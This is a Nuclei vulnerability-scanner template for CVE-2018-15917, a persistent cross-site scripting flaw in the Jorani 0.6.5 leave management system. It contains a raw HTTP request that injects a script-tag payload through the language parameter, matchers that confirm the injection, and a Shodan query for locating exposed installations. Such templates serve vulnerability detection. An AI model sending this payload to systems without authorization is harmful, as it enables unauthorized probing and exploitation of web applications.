nuclei-templates/http/cves/2018/CVE-2018-15917.yaml

61 lines
1.8 KiB
YAML

id: CVE-2018-15917
info:
name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/45338
- https://nvd.nist.gov/vuln/detail/CVE-2018-15917
- https://github.com/bbalet/jorani/issues/254
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2018-15917
cwe-id: CWE-79
epss-score: 0.05086
epss-percentile: 0.92019
cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: jorani_project
product: jorani
shodan-query: title:"Login - Jorani"
tags: cve,cve2018,jorani,xss
http:
- raw:
- |
GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1
Host: {{Hostname}}
- |
GET /session/login HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- '_jorani'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100cc241079a80ddb29281c071b45ea5f1bff81540d4dbbb1043f8a364f1a8a4ebb0221009eb020e96c8a7eae23fe4df34ed1bddb65aec04f084debe7674d84955e770136:922c64590222798bb761d5b6d8e72950